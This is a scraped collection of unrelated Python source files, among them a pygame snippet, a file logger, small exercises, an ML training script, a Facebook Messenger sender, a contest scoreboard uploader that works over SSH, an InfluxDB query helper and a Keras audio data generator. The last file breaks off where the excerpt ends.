img_texto = fonte.render(texto, True, BRANCO)
tela.fill(PRETO)
tela.blit(img_texto, (168, 433))
pygame.draw.rect(tela, BRANCO, (0 + 5, 400, 800 - 10, 200 - 5), 5)
pygame.draw.rect(tela, BRANCO, (38, 433, 100, 133), 0)
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
if event.type == pygame.KEYUP:
if event.key == pygame.K_ESCAPE:
exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP:
score += 10
if event.key == pygame.K_DOWN:
score -= 10
| true |
0c73c27ba0d59606669b1bfb6dacd863b5ad3bd6 | Python | daclink/Final_Project_IST338 | /logger.py | UTF-8 | 4,350 | 3.0625 | 3 | [] | no_license | ###
# Drew A. Clinkenbeard
# Error Reporter and Logger
# 29 - April - 2014
# Since I broke this apart into multiple classes
# I needed a more flexible logging system.
###
from time import localtime, strftime
class Logger():
def __init__(self, fileName="admm.log"):
"""
I like using tail -F to have a running log of errors and such.
rather than just printing to a file and checking it I thought I would create
a system to make that possible
Inputs: str fileName the name of the file being written
Output: creates a file named fileName
"""
self.fileName = fileName
try :
f = open(fileName,'a')
except :
print "Error: Couldn't Open File {0}".format(fileName)
finally :
f.close()
def __repr__(self):
return "Writing to file: {0}".format(self.fileName)
def _err(self,e=False,msg=False,line=False,fileName=False):
"""
Used to write errors. Errors and logs have a different look than logs
inputs: Exception e an exception. Only prints if it is present.
Default: False
str msg: The message to print. Won't print if not present
Default: False
int line: the line on which the error occurred. Works
well with getframeinfo(currentframe()).lineno
Default False
str fileName: the name of the file where the error occured
Default False
output: Writes to the specified log file.
Example Error Message:
[*** Error ***]
[30.Apr.2015 16:59:26] [Line : 212]
[Message: inventory is exit ]
[Error Supplied: string indices must be integers, not str]n
*********************************
"""
f = open(self.fileName,'a')
report = "\n[*** Error ***]\n"
report += strftime("[%d.%b.%Y %H:%M:%S] ",localtime())
if fileName:
report == "[File : {0}] \n".format(fileName)
if line:
report += "[Line : {0}]\n".format(line)
if msg:
report += "[Message: {0} ]\n".format(msg)
if e:
report += "[Error Supplied: {0}]n".format(e)
report += "\n*********************************\n"
f.write(report)
f.close()
def _log(self,msg,line=False,level="Low",fileName=False):
"""
Used to log actions.
inputs: str msg: the message to be logged.
int line: the line where the log originated works
well with getframeinfo(currentframe()).lineno
Default : False
str level: the log level. This could be used to determine
which log statements are written. Not really
implemented here.
Default: 'low'
str fileName: the file where the log statement originated
Default: False
output: Writes to the specified log
Example Log entry:
=-=-= Log Level: Low =-=-=-=
[25.Apr.2015 15:32:51]
line : 355
message: length of roomY 26, length of roomX 26)
=-=-=-=-=-=-=-=-=-=-=-=
"""
f = open(self.fileName,'a')
report = "\n[Log {0}]\n".format(level)
report += strftime("[%d.%b.%Y %H:%M:%S]\n ",localtime())
if fileName:
report == "[File : {0}] \n".format(fileName)
if line:
report += "[Line : {0}]\n".format(line)
if msg:
report += "[Message: {0} ]\n".format(msg)
report += "\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"
f.write(report)
def closeFile(self):
"""
Used to close the log file if necessary. Shouldn't be needed...
"""
try :
self.f.close()
return true
except:
print "Error Closing file {0}".format(self.fileName)
return False
# class admm_logger(logger):
# def __err__(self,e=False,values=False,line=False):
# stats = "minY %d maxY %d\n" %(self.minY, self.maxY)
# stats += "minX %d maxX %d\n" %(self.minX, self.maxX)
# stats += "len(self.maze) %d len(self.maze[self.minY]) %d" %(len(self.maze) , len(self.maze[self.minY]))
# report = strftime("[%d.%b.%Y %H:%M:%S] ",localtime())
# report += 'KeyError: ['
# report += str(e)
# report += ']\n'
# log.write(report)
# log.write("\n**stats**\n")
# log.write(stats)
# log.write("\n**stats**\n")
# log.write("\n ** report **\n")
# json.dump(values,log)
# log.write("\n ** report **\n")
# def __logger__(self,msg,line="none",level="Low"):
# log.write("=-=-= Log Level: %s =-=-=-=\n" %(level))
# log.write(strftime("[%d.%b.%Y %H:%M:%S] \n ",localtime()))
# log.write("line : \t %s \n" %(str(line)))
# log.write("message: \t")
# log.write(msg)
# log.write("\n=-=-=-=-=-=-=-=-=-=-=-=\n")
| true |
a3a0d613e0bcddc228850c5b9fb383db8f447b87 | Python | ArseniyCool/Python-YandexLyceum2019-2021 | /Основы программирования Python/5. Debugger/Псевдоним-пасьянс.py | UTF-8 | 845 | 3.828125 | 4 | [] | no_license | # По игре Ним-пасьянс с ограничением:
# можно за один ход взять не больше трёх камней.
# Игрок может попытаться взять больше трёх камней, меньше одного или больше оставшегося количества,
# но в этих случаях его ход игнорируется, и программа ещё раз выводит не изменившееся количество камней.
a = int(input('Введите изначальное количество камней в кучке:'))
while a != 0:
b = int(input('Введите кол-во камней,которое Вы хотите забрать из кучки:'))
if 0 < b < 4 and b <= a:
a = a - b
print(a)
| true |
d2d938c136741471f678a2701d513aec58d28ab1 | Python | kajaltingare/Python | /Dictionary/cntWordsIntoDict.py | UTF-8 | 546 | 4.0625 | 4 | [] | no_license | # Write a program to accept a paragraph from user & return a dictionary of count of words in it.
def cntWordsIntoDict(ipString):
opDict={}
for ch in ipString.split():
if(opDict.get(ch)!=None):
opDict[ch]+=1
else:
opDict[ch]=1
return opDict
def main():
ipString = eval(input('Enter the sentence to count char in it: '))
opDict = cntWordsIntoDict(ipString)
print('Count of words in a paragraph: {0}'.format(opDict))
if __name__ == '__main__':
main()
| true |
ce24cdf44ebdcfdfe20b72948a311c65993d4dd1 | Python | harry123180/opencv_find_objects | /GMTCV/ik.py | UTF-8 | 494 | 3.0625 | 3 | [] | no_license | import math
l1 = 4
l2 = 3
pi = 3.14159
x =-4
y = 0
theta = 90
Kdeg = 180/pi
def ik(x,y,theta):
v2 = (pow(x,2)+pow(y,2)-pow(l1,2)-pow(l2,2))/(2*l1*l2)
d2 = math.acos(v2)
k1 = l1+l2*math.cos(d2)
k2 = l2*math.sin(d2)
d1 = math.atan2(y,x)-math.atan2(k2,k1)
fai = theta*pi/180
d3 = (fai-d2-d1)
#beta = (d2*180/pi)+(d1*180/pi)
#gama=d3+beta
#print('gama= ' ,gama)
#d1 = d1*Kdeg
#d2 = d2*Kdeg
#d3 = d3*Kdeg
return d1,d2,d3
print(ik(-4,0,90))
| true |
3ae208a9021a62a1030e67b690c5c7dd8b780803 | Python | JINO-ROHIT/IPL-Score-Prediction | /src/train.py | UTF-8 | 2,271 | 2.53125 | 3 | [] | no_license | from ast import parse
import joblib
import os
import argparse
import config
import model_dispatcher
import pandas as pd
import numpy as np
from sklearn import metrics
from sklearn import ensemble
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
df = pd.read_csv(config.TRAINING_FILE)
#print(df.columns)
def data_encoding( encoding_strategy , encoding_data , encoding_columns ):
if encoding_strategy == "LabelEncoding":
print("LabelEncoding chosen")
Encoder = LabelEncoder()
for column in encoding_columns :
print("column",column )
encoding_data[ column ] = Encoder.fit_transform(tuple(encoding_data[ column ]))
elif encoding_strategy == "OneHotEncoding":
print("OneHotEncoding chosen")
encoding_data = pd.get_dummies(encoding_data)
dtypes_list =['float64','float32','int64','int32']
encoding_data.astype( dtypes_list[0] ).dtypes
return encoding_data
cat_cols = ['venue','bat_team','bowl_team']
encoding_strategy = ['LabelEncoding','OneHotEncoding']
encoded_df = data_encoding(encoding_strategy[1], df, cat_cols) #ohe for forest based algorithm
encoded_df = encoded_df.drop(['venue_Barabati Stadium','bat_team_Chennai Super Kings','bowl_team_Chennai Super Kings'],axis =1)
def run(fold,model):
df_train = encoded_df[encoded_df.kfold != fold].reset_index(drop=True)
df_valid = encoded_df[encoded_df.kfold == fold].reset_index(drop=True)
x_train = df_train.drop("total", axis=1).values
y_train = df_train.total.values
x_valid = df_valid.drop("total", axis=1).values
y_valid = df_valid.total.values
clf = model_dispatcher.models[model]
clf.fit(x_train, y_train)
preds = clf.predict(x_valid)
error = np.sqrt(mean_squared_error(y_valid,preds))
print(f"Fold = {fold}, error = {error}")
joblib.dump(clf, os.path.join(config.MODEL_OUTPUT,f"dt_{fold}.bin"))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--fold',
type = int
)
parser.add_argument(
'--model',
type = str
)
args = parser.parse_args()
run(
fold= args.fold,
model = args.model
) | true |
442ce3c013f419ded55bd05c2a017d9e2088fa1a | Python | Manovah/guvi | /code kata/min_to_hrs.py | UTF-8 | 76 | 3.21875 | 3 | [] | no_license | q=int(input())
if(q<59):
print(0,q)
else:
d=q//60
b=q%60
print(d,b)
| true |
7e9ced26af38c3c8e4e10722826244b7d080d330 | Python | QuentinCG/Base-Scripts | /OS_Independent/utils/fb_messenger_send.py | UTF-8 | 4,402 | 2.71875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Utility functions to send message/image with Facebook messenger (can also be called with shell)
"""
__author__ = 'Quentin Comte-Gaz'
__email__ = "quentin@comte-gaz.com"
__license__ = "MIT License"
__copyright__ = "Copyright Quentin Comte-Gaz (2017)"
__python_version__ = "3.+ (SSL not supported correctly with 2.7+)"
__version__ = "1.0 (2017/04/25)"
__status__ = "Usable for any project"
__dependency__ = "fbchat (use 'pip install fbchat' to install package)"
import sys, getopt, logging
import fbchat
from fbchat.models import *
def sendWithFacebookMessenger(email_address, password, receiver_id, message, image_path, debug=True):
"""Send message and or image via Facebook Messenger
Keyword arguments:
email_address -- (string) Facebook email address
password -- (string) Facebook password
receiver_id -- (string) ID of the user receiving the file
message -- (string) Message to send
image_path -- (string) Path of the file to send
debug -- (bool, optional) Show debug information
return: (bool) Image and or message sent
"""
return_value = False
# Initialize the dropbox connection
client = fbchat.Client(email_address, password)
if message != "" and image_path == "":
try:
client.sendMessage(message, thread_id=receiver_id, thread_type=ThreadType.USER)
return_value = True
# TODO: Be more precise in exceptions (but a lot of exceptions can occure with client.send)
except Exception:
pass
elif image_path != "":
try:
client.sendLocalImage(image_path, message=message, thread_id=receiver_id, thread_type=ThreadType.USER)
return_value = True
# TODO: Be more precise in exceptions (but a lot of exceptions can occure with client.send)
except Exception:
pass
return return_value
################################# HELP FUNCTION ################################
def __help():
# Help
print("HELP (-h, --help): Give information to use facebook messenger script")
print("EMAIL (-e, --email): Email (of the sender)")
print("PASSWORD (-p, --password): Password (of the sender)")
print("RECEIVER (-r, --receiver): Receiver ID")
print("MESSAGE (-m, --message): Message to send")
print("IMAGE (-i, --image): Image to send")
print("\n\n")
print("Example (send image AND message): python fb_messenger_send.py --email \"{email here}\" --password \"{password here}\" --receiver \"{receiver id here}\" --message \"Hello World\" --image \"/tmp/dummy.png\"")
################################# MAIN FUNCTION ###############################
def main():
"""Shell facebook messenger utility function"""
# Set the log level (no log will be shown if "logging.CRITICAL" is used)
logger = logging.getLogger()
logger.setLevel(logging.CRITICAL)
# Have input() function compatible with python 2+ and 3+
try:
input = raw_input
except NameError:
pass
_email = ""
_password = ""
_receiver = ""
_message = ""
_image = ""
# Get options
try:
opts, args = getopt.getopt(sys.argv[1:], "he:p:r:m:i:",
["help", "email=", "password=", "receiver=", "message=", "image="])
except getopt.GetoptError as err:
print("[ERROR] "+str(err))
__help()
sys.exit(1)
# Show help (if requested)
for o, a in opts:
if o in ("-h", "--help"):
__help()
sys.exit(0)
# Get base parameters
for o, a in opts:
if o in ("-e", "--email"):
_email = str(a)
continue
if o in ("-p", "--password"):
_password = str(a)
continue
if o in ("-r", "--receiver"):
_receiver = str(a)
continue
if o in ("-m", "--message"):
_message = str(a)
continue
if o in ("-i", "--image"):
_image = str(a)
continue
if _email == "":
print("[ERROR] No authentification email specified")
__help()
sys.exit(1)
if _password == "":
print("[ERROR] No authentification password specified")
__help()
sys.exit(1)
if _receiver == "" or (_message == "" and _image == ""):
print("[ERROR] No receiver or message/image specified")
__help()
sys.exit(1)
return_value = sendWithFacebookMessenger(email_address=_email, password=_password, receiver_id=_receiver, message=_message, image_path=_image, debug=True)
if return_value:
sys.exit(0)
sys.exit(1)
if __name__ == "__main__":
main()
| true |
67279ec82cf6e2f8b472727cd58f0068a7e852c0 | Python | lancelafontaine/caproomster | /app/core/equipment_test.py | UTF-8 | 499 | 2.625 | 3 | [] | no_license | from app.core.equipment import Equipment
def test_equipment_with_no_arguments_is_zero_length():
equipment = Equipment("equipmentID_uybino")
assert 0 == len(equipment)
def test_equipment_getting_number_of_equipment_needed():
equipment7 = Equipment("equipmentID_ibiubi",laptops=2,projectors=1,whiteboards=4)
assert 7 == len(equipment7)
equipment1 = Equipment("equipmentID",0,1,0)
assert 1 == len(equipment1)
equipment4 = Equipment("equipmentID_12313", 1,2,1)
assert 4 == len(equipment4)
| true |
f5842ab82da63d07d20db85f63ce4c43747fbe09 | Python | ShreeyaVK/Python_scripts | /change_delimiter.py | UTF-8 | 735 | 2.765625 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 23 19:03:55 2017
@author: Sadhna Kathuria
"""
import pandas as pd
#change the delimter of a dataset
path = 'C:/Users/Sadhna Kathuria/Documents/Shreeya_Programming/Predictive/Chapter 2'
#filename1 = 'titanic3.csv'
filename2 = 'Customer Churn Model.txt'
filename_tab = 'Tab Customer Churn Model.txt'
#filename3 = 'titanic3.xls'
#fullpath = os.path.join(path, filename)
infile = path + '/' + filename2
outfile = path +'/' + filename_tab
with open(infile) as infile1:
with open(outfile, 'w') as outfile1:
for line in infile1:
fields = line.split(',')
outfile1.write('/t'.join(fields))
data = pd.read_csv(outfile1)
print data
| true |
409e5a90dad58ad4566b493c3838ad081272a27f | Python | uchicago-cs/icpc-tools | /scoreboard-publish/scoreboard-publish.py | UTF-8 | 15,397 | 2.5625 | 3 | [] | no_license | #!/usr/bin/python
# PC^2 scoreboard publishing script
#
# See README for instructions
#
# (c) 2014, Borja Sotomayor
from argparse import ArgumentParser, FileType
from pprint import pprint as pp
from datetime import datetime
import os
import os.path
import stat
import subprocess
import socket
import time
import re
import urllib2
try:
import yaml
import paramiko
except ImportError, ie:
print "Your system is missing a required software library to run this script."
print "Try running the following:"
print
print " pip install --user PyYAML paramiko"
print
exit(1)
# Constants
# To avoid users from shooting themselves in the foot,
# the minimum interval between scoreboard intervals is
# 10 seconds. Change this at your own peril.
MIN_UPDATE_INTERVAL = 10
# When to start warning that the scoreboard will be frozen
FREEZE_WARNING_MINUTES = 10
# Globals
verbose = False
def log(msg):
print "[%s] %s" % (now_str(), msg)
def vlog(msg):
if verbose:
log(msg)
def now_str():
return datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def td_str(td):
s = int(td.total_seconds())
hours = s / 3600
s = s % 3600
minutes = s / 60
seconds = s % 60
return "%i hour(s), %i minutes(s), %i seconds(s)" % (hours, minutes, seconds)
def print_http_response(response):
print "HTTP Status Code: %i" % response.status_code
print
print "HTTP Response"
print "-------------"
pp(response.headers.items())
print
pp(response.text)
def connect_to_server(server, username, path):
ntries = 3
reconnect = 5
while ntries > 0:
success = True
try:
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
ssh.connect(hostname=server, username=username)
sftp = ssh.open_sftp()
except paramiko.AuthenticationException, ae:
log("ERROR: Authentication error connection to %s" % server)
success = False
except paramiko.SSHException, sshe:
log("ERROR: SSH error when connecting to %s" % server)
success = False
except socket.error:
log("ERROR: Network error when connecting to %s" % server)
success = False
if not success:
ntries -= 1
if ntries == 0:
log("ERROR: Unable to connect to %s. Giving up." % server)
exit(1)
log("Trying to reconnect to %s in %i seconds (%i tries left)" % (server, reconnect, ntries))
time.sleep(reconnect)
reconnect = 2*reconnect
else:
break
try:
stdin, stdout, stderr = ssh.exec_command('stat %s' % path)
so = stdout.read()
se = stderr.read()
if len(se) > 0:
print "ERROR: Error when trying to read remote web directory %s" % path
print
print "stderr: %s" % (se)
exit(1)
except paramiko.SSHException, sshe:
print "ERROR: SSH error when connecting to %s (couldn't stat remote directory)" % server
exit(1)
try:
sftp.chdir(path)
except IOError, ioe:
print "ERROR: Could not set SFTP client to directory %s" % path
exit(1)
return ssh, sftp
def load_config_file(config):
if type(config) != dict:
print "ERROR: Improperly formatted configuration file (not a YAML object)"
exit(1)
for v in ("pc2_dir", "scoreboard_files", "web_server", "web_username", "web_path"):
if not config.has_key(v):
print "ERROR: Config file missing '%s' value" % v
exit(1)
if not config.has_key("freeze_message"):
config["freeze_message"] = "The scoreboard is frozen."
pc2_dir = config["pc2_dir"]
if not os.path.exists(config["pc2_dir"]):
print "ERROR: Specified pc2_dir (%s) does not exist" % pc2_dir
exit(1)
scoreboard_files = config["scoreboard_files"]
if type(scoreboard_files) != list:
print "ERROR: value of scoreboard_files should be a list of values"
exit(1)
for f in scoreboard_files:
ff = pc2_dir + "/" + f
if not os.path.exists(ff):
print "ERROR: Scoreboard file '%s' does not exist" + ff
exit(1)
ssh_web, sftp_web = connect_to_server(config["web_server"], config["web_username"], config["web_path"])
has_ewteam = True
for v in ("ewteam_server", "ewteam_username", "ewteam_path"):
if not config.has_key(v):
has_ewteam = False
break
if has_ewteam:
if config["ewteam_server"] == config["web_server"]:
ssh_ewteam = ssh_web
sftp_ewteam = ssh_ewteam.open_sftp()
try:
sftp_ewteam.chdir(config["ewteam_path"])
except IOError, ioe:
print "ERROR: Could not set SFTP client to directory %s" % config["ewteam_path"]
exit(1)
else:
ssh_ewteam, sftp_ewteam = connect_to_server(config["ewteam_server"], config["ewteam_username"], config["ewteam_path"])
else:
ssh_ewteam = None
sftp_ewteam = None
return ssh_web, sftp_web, ssh_ewteam, sftp_ewteam
def generate_frozen_file(d, f, freeze_message):
# TODO: Include timezone in message
frozen_text = "<p style='font: bold 18px Arial, Sans-serif; color: red'>%s</p>\r\n" % freeze_message
frozen_text += "<p style='font: 12px Arial, Sans-serif'>Scoreboard was frozen at %s</p>" % now_str()
frozen_scoreboard_file = f.replace(".html", "-frozen.html")
sbf = open(d + "/" + f)
sb_src = sbf.read()
sbf.close()
sb_src = re.sub("BODY>\s*<TABLE", "BODY>\r\n%s\r\n<TABLE" % frozen_text, sb_src)
sbf = open(d + "/" + frozen_scoreboard_file, "w")
sbf.write(sb_src)
sbf.close()
return frozen_scoreboard_file
def upload_scoreboard(sftp_client, files, freeze, freeze_message, suffix, chmod = False):
for d, f in files:
if freeze:
frozen_file = generate_frozen_file(d, f, freeze_message)
localpath = "%s/%s" % (d,frozen_file)
else:
localpath = "%s/%s" % (d,f)
try:
if suffix is not None:
fname = f.replace(".html", "-%s.html" % suffix)
else:
fname = f
sftp_client.put(localpath, fname)
except Exception, e:
raise
print "ERROR: Unable to upload file %s" % fname
if chmod:
try:
sftp_client.chmod(fname, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
except Exception, e:
print "ERROR: Unable to chmod file %s" % fname
log("Uploaded scoreboard")
def upload_scoreboard_every(sftp_client, files, suffix, freeze_at, interval):
last_modified = dict([ ( (d,f), 0.0 ) for (d,f) in scoreboard_files ])
chmod = True
while True:
# Have there been any changes to the scoreboard?
changed = False
for ( (d,f), mtime) in last_modified.items():
new_mtime = os.stat(d+"/"+f).st_mtime
if new_mtime > mtime:
changed = True
last_modified[(d,f)] = new_mtime
if changed:
upload_scoreboard(sftp_client = sftp_client,
files = files,
freeze = False,
freeze_message = None,
suffix = suffix,
chmod = chmod)
# We only want to chmod the first time we upload
if chmod:
chmod = False
else:
log("Scoreboard hasn't changed. Not uploading")
if freeze_at is not None:
td = freeze_at - datetime.now()
tds = td.total_seconds()
if tds < 0:
break
if tds < (FREEZE_WARNING_MINUTES * 60):
log("ATTENTION: The scoreboard will be frozen in %s" % td_str(td))
time.sleep(interval)
def freeze_ewteam(sftp, scoreboard_url, freeze_message):
scoreboard_file = "./Team/iScoreBoard.php"
scoreboard_file_backup = "./Team/iScoreBoard.txt"
try:
sftp.stat(scoreboard_file)
except IOError, ioe:
log("EWTeam server doesn't seem to contain EWTeam (%s not found)" % (scoreboard_file))
return False
try:
sftp.stat(scoreboard_file_backup)
log("The EWTeam scoreboard is already frozen. You cannot re-freeze it.")
return False
except IOError, ioe:
pass
try:
backupf = sftp.open(scoreboard_file_backup, "w")
sftp.getfo(scoreboard_file, backupf)
backupf.close()
except Exception, e:
log("Could not create backup of scoreboard file")
return False
if scoreboard_url[-1] != "/":
scoreboard_url += "/"
scoreboard_url = scoreboard_url + "Team/iScoreBoard.php"
try:
sb = urllib2.urlopen(scoreboard_url)
except urllib2.HTTPError, he:
log("EWTeam scoreboard not found.")
log("%s produced error %s %s" % (scoreboard_url, he.code, he.msg))
return False
except Exception, e:
log("Unexpected exception accessing scoreboard.")
return False
frozen_text = "<p style='font: bold 18px Arial, Sans-serif; color: red'>%s</p>\r\n" % freeze_message
frozen_text += "<p style='font: 12px Arial, Sans-serif'>Scoreboard was frozen at %s (Central time)</p>" % now_str()
sb_src = sb.read()
sb_src = re.sub("body>\s*<table", "body>\r\n%s\r\n<table" % frozen_text, sb_src)
try:
sbf = sftp.open(scoreboard_file, "w")
sbf.write(sb_src)
sbf.close()
except Exception, e:
log("Could not write frozen scoreboard")
return False
log("Froze EWTeam scoreboard")
def thaw_ewteam(sftp):
scoreboard_file = "./Team/iScoreBoard.php"
scoreboard_file_backup = "./Team/iScoreBoard.txt"
try:
sftp.stat(scoreboard_file)
except IOError, ioe:
log("EWTeam server doesn't seem to contain EWTeam (%s not found)" % (scoreboard_file))
return False
try:
sftp.stat(scoreboard_file_backup)
except IOError, ioe:
log("EWTeam server doesn't seem to contain a backup of the scoreboard PHP file (%s not found)" % (scoreboard_file))
return False
try:
sbf = sftp.open(scoreboard_file, "w")
sftp.getfo(scoreboard_file_backup, sbf)
sbf.close()
except Exception, e:
log("Could not restore backup of scoreboard file")
return False
try:
sftp.remove(scoreboard_file_backup)
except Exception, e:
log("Could not delete backup of scoreboard PHP")
return False
log("Thawed EWTeam scoreboard")
### MAIN PROGRAM ###
if __name__ == "__main__":
# Setup argument parser
parser = ArgumentParser(description="scoreboard-publish")
parser.add_argument('config', metavar='CONFIG_FILE', type=FileType('r'))
parser.add_argument('--freeze', action="store_true")
parser.add_argument('--thaw-ewteam', action="store_true")
parser.add_argument('--suffix', metavar='SUFFIX', type=str, default=None)
parser.add_argument('--update', metavar='SECONDS', type=int, default=0)
parser.add_argument('--freeze-at', metavar='DATE_TIME', type=str, default=None)
parser.add_argument('--freeze-suffix', metavar='SUFFIX', type=str, default=None)
parser.add_argument('--verbose', action="store_true")
args = parser.parse_args()
if args.verbose:
verbose = True
try:
config = yaml.load(args.config.read())
except Exception, e:
print "ERROR: Could not read configuration file"
if verbose: raise
exit(1)
ssh_web, sftp_web, ssh_ewteam, sftp_ewteam = load_config_file(config)
if args.thaw_ewteam and sftp_ewteam is None:
print "ERROR: --thaw-ewteam specified but no EWTeam server specified in configuration file"
exit(1)
scoreboard_files = [(config["pc2_dir"], f) for f in config["scoreboard_files"]]
if args.update == 0:
if args.freeze_at:
print "ERROR: Cannot use --freeze-at without --update"
exit(1)
upload_scoreboard(sftp_client = sftp_web,
files = scoreboard_files,
freeze = args.freeze,
freeze_message = config["freeze_message"],
suffix = args.suffix,
chmod = True)
if args.freeze and sftp_ewteam is not None:
freeze_ewteam(sftp_ewteam, config["ewteam_scoreboard_url"], config["freeze_message"])
if args.thaw_ewteam:
thaw_ewteam(sftp_ewteam)
elif args.update >= MIN_UPDATE_INTERVAL:
if args.freeze:
print "ERROR: Cannot use --freeze with --update"
exit(1)
if args.suffix is not None and args.freeze_at is not None:
print "ERROR: Cannot use --freeze-at with --suffix"
exit(1)
if args.thaw_ewteam:
print "ERROR: Cannot use --thaw-ewteam with --update"
exit(1)
if args.freeze_at is not None:
try:
freeze_at = datetime.strptime(args.freeze_at, "%Y-%m-%d %H:%M")
except ValueError, ve:
print "ERROR: Invalid date %s (should be YYYY-MM-DD HH:MM)"
exit(1)
if freeze_at < datetime.now():
print "ERROR: You have specified a freezing time that has already passed"
exit(1)
log("The scoreboard will be frozen at %s (in %s)" % (args.freeze_at, td_str(freeze_at - datetime.now())))
else:
freeze_at = None
upload_scoreboard_every(sftp_client = sftp_web,
files = scoreboard_files,
suffix = args.suffix,
freeze_at = freeze_at,
interval = args.update)
if freeze_at is not None:
# Freeze the scoreboard
log("Uploading frozen scoreboard")
upload_scoreboard(sftp_client = sftp_web,
files = scoreboard_files,
freeze = True,
freeze_message = config["freeze_message"],
suffix = None,
chmod = False)
if sftp_ewteam is not None:
freeze_ewteam(sftp_ewteam, config["ewteam_scoreboard_url"], config["freeze_message"])
if args.freeze_suffix is not None:
log("Beginning upload to post-freeze suffix (%s)" % args.freeze_suffix)
upload_scoreboard_every(sftp_client = sftp_web,
files = scoreboard_files,
suffix = args.freeze_suffix,
freeze_at = None,
interval = args.update)
else:
print "ERROR: Update interval must be at least %i seconds" % MIN_UPDATE_INTERVAL
exit(1)
| true |
ff747d97e8ac35c4b6d43513f01ceec88cbc8ced | Python | hpcloud-mon/monasca_query_language | /mql/influx_repo.py | UTF-8 | 3,897 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive | import datetime
import sys
import numpy
from influxdb import client
import mql_parser
influxdb_client = client.InfluxDBClient(
"192.168.10.6", "8086",
"", "",
"mon")
functions_for_repo = {
'avg': 'mean',
'max': 'max',
'min': 'min',
'count': 'count',
'sum': 'sum',
'rate': 'derivative'
}
# class Range(object):
# def __init__(self, name, dimensions, values):
# self.name = name
# self.dimensions = dimensions
# self.values = values
#
#
# class Vector(object):
# def __init__(self):
# pass
def get_function(function):
if function in functions_for_repo:
return functions_for_repo[function]
else:
return None
def _double_quote(string):
return '"' + string + '"'
def _single_quote(string):
return "'" + string + "'"
def query(name, dimensions, function=None, start_time=None, end_time=None, group_by=None,
bucket_size=None):
base_query = "Select {value} from \"{metric_name}\" " \
"{where_clause} " \
"{group_by} {limit}"
# handle name is missing (if name is in dimensions, this will be overwritten below)
if name is not None:
metric_name = name
else:
metric_name = '/.*/'
# create where clauses
where_clauses = []
if dimensions is not None:
for dim in dimensions:
clause = _double_quote(dim.key) + dim.operator
if '~' in dim.operator:
clause += dim.value
else:
clause += _single_quote(dim.value)
where_clauses.append(clause)
# if there is no range on a metric, we will collect only the last value
limit = None
if function == 'last_force':
function = 'last'
bucket_size = None
limit = 1
# add bucket size to group_by if exists
if function is not None and bucket_size is not None:
time_str = 'time(' + str(bucket_size) + 's)'
if isinstance(group_by, list):
group_by.append(time_str)
else:
group_by = [time_str]
if start_time is not None:
where_clauses.append('time >= \'' + start_time.isoformat() + 'Z\'')
if end_time is not None:
where_clauses.append('time <= \'' + end_time.isoformat() + 'Z\'')
final_query = base_query.format(
value=function + '(value) as value' if function is not None else 'value',
metric_name=metric_name,
where_clause=' where ' + " and ".join(where_clauses) if where_clauses else "",
group_by=' group by ' + ','.join(group_by) if group_by is not None else "",
limit=" limit " + str(limit) if limit is not None else ""
)
print(final_query)
return parse_influx_results(influxdb_client.query(final_query, epoch='ms'))
def parse_influx_results(influx_data):
# print(influx_data)
results = []
definitions = {}
for key, series in influx_data.items():
key_str = str(key)
definitions[key_str] = key
time_series = []
for point in influx_data[key]:
if point['value'] is None:
continue
time_series.append((point['time'], point['value']))
results.append((key, numpy.rec.array(time_series)))
return results
def main():
data_start_time = datetime.datetime.strptime("2017-01-23T16:00:00.000Z", '%Y-%m-%dT%H:%M:%S.%fZ')
query("cpu.idle_perc", None)
query(None, [mql_parser.Dimension(['hostname', '=', 'devstack'])])
query("cpu.idle_perc", None,
start_time=data_start_time,
end_time=data_start_time + datetime.timedelta(minutes=5))
query("cpu.idle_perc", None,
function='last',
start_time=data_start_time,
end_time=data_start_time + datetime.timedelta(minutes=5),
bucket_size='60s')
if __name__ == '__main__':
sys.exit(main())
| true |
3baf987cd1be64f1e8b5485141022e396003ea1c | Python | PTITLab/Multitask-Breath-Sound | /Breath-Code/dataset.py | UTF-8 | 3,505 | 2.890625 | 3 | [] | no_license | import numpy as np
import keras
from scipy.io import wavfile
import librosa
import os
from keras.utils import to_categorical
class BreathDataGenerator(keras.utils.Sequence):
'Generates data for Keras'
def __init__(self, directory,
list_labels=['normal', 'deep', 'strong'],
batch_size=32,
dim=None,
classes=None,
shuffle=True):
'Initialization'
self.directory = directory
self.list_labels = list_labels
self.dim = dim
self.__flow_from_directory(self.directory)
self.batch_size = batch_size
self.classes = len(self.list_labels)
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(len(self.wavs) / self.batch_size))
def __getitem__(self, index):
# print("In get Item!!")
# 'Generate one batch of data'
# Generate indexes of the batch
indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
# Find list of IDs
rawX = [self.wavs[k] for k in indexes]
rawY = [self.labels[k] for k in indexes]
# Generate data
X, Y = self.__feature_extraction(rawX, rawY)
# print("Done getting data")
return X, Y
def __flow_from_directory(self, directory):
self.wavs = []
self.labels = []
for dir in os.listdir(directory):
sub_dir = os.path.join(directory, dir)
if os.path.isdir(sub_dir) and dir in self.list_labels:
label = self.list_labels.index(dir)
for file in os.listdir(sub_dir):
self.wavs.append(os.path.join(sub_dir, file))
self.labels.append(label)
def on_epoch_end(self):
'Updates indexes after each epoch'
self.indexes = np.arange(len(self.wavs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __feature_extraction(self, list_wav, list_label):
# print("Go to feature extraction!!!")
'Generates data containing batch_size samples'
X = []
Y = []
for i in range(self.batch_size):
rate, data = wavfile.read(list_wav[i]) #bug in here
# print("End")
data = np.array(data, dtype=np.float32)
data *= 1./32768
# feature = librosa.feature.melspectrogram(y=data, sr=rate, n_fft=2048, hop_length=512, power=2.0)
feature = librosa.feature.mfcc(y=data, sr=rate,
n_mfcc=40, fmin=0, fmax=8000,
